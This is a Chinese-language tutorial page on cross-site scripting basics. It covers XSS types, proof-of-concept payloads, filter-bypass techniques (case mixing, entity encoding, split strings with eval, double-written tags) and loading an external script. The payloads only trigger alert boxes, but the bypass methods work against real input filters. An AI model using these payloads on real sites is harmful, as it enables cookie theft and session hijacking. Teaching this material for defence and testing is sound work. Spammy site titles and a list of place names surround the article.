中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

XSS漏洞基礎知識有哪些

發布時間:2021-12-10 09:21:00 來源:億速云 閱讀:193 作者:柒染 欄目:大數據

XSS漏洞基礎知識有哪些,很多新手對此不是很清楚,為了幫助大家解決這個難題,下面小編將為大家詳細講解,有這方面需求的人可以來學習下,希望你能有所收獲。

一、XSS漏洞危害

1、盜取各種用戶賬號

2、竊取用戶cookie

3、劫持用戶會話

4、刷流量,執行彈窗

二、漏洞驗證

1、在登錄框輸入下面代碼,點擊登錄

<script>alert(123)</script>

XSS漏洞基礎知識有哪些

2、彈出對話框,說明存在xss漏洞

XSS漏洞基礎知識有哪些

三、漏洞分類

1、反射型

只能利用一次,必須構造特殊的連接讓目標點擊,比如上面的登錄界面。

2、存儲型

將特殊語句存儲到頁面,只要目標瀏覽該網頁,就會被攻擊,比如留言板。

3、DOM型

不與服務器進行交互,利用在本地渲染網頁時觸發

四、payload構造

偽協議

<a href="javascript:alert(123)">aiyou</a>

事件

<img src="./1.jpg" onmouseover='alert(123)'><img src="#" onerror='alert(123)'><input type="text" onkeydown="alert(123)"><input type="button" onclick="alert(123)"><div style="width:expression(alert(xss))">

五、繞過防護

1、大小寫繞過

<SCript>alert(123)</SCript>

2、引號的使用

<img src="#" onerror="alert(123)"/><img src='#' onerror='alert(123)'/><img src=# onerror=alert(123) />

3、“/”代替空格

<img/src='#'/Onerror='alert(123)'>

4、對標簽屬性值轉碼

字母    ASCII  十進制編碼  十六進制編碼

a        97         &#97;        &#x61;

<a href="j&#97;v&#x61script:alert(123)">aiyou</a>

5、頭插入&#01;尾插入&#02;

<a href="&#01;j&#97;v&#x61script:alert(123)&#02;">aiyou</a>

6、拆分

<script>z='alert'</script><script>z=z+'(123)'</script><script>eval(z)</script>

7、雙寫繞過

<scrscriptipt>alert(123)</scscriptript>

六、外部調用

1、新建一個xss.js,內容為

alert(213);

2、構建paylaod,提交

<script src="http://192.168.1.129/js/xss.js"></script>

看完上述內容是否對您有幫助呢?如果還想對相關知識有進一步的了解或閱讀更多相關文章,請關注億速云行業資訊頻道,感謝您對億速云的支持。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

xss
AI

胶州市| 安义县| 江口县| 庆云县| 屏东县| 湘乡市| 内黄县| 松阳县| 汪清县| 吉隆县| 耒阳市| 宣武区| 英德市| 石景山区| 新密市| 浙江省| 柯坪县| 偃师市| 仁怀市| 乾安县| 泸西县| 奎屯市| 利辛县| 康马县| 台北县| 河西区| 石城县| 萍乡市| 吉林省| 辽阳县| 天长市| 西峡县| 绩溪县| 中阳县| 绿春县| 临朐县| 民权县| 隆林| 平武县| 巢湖市| 泸西县|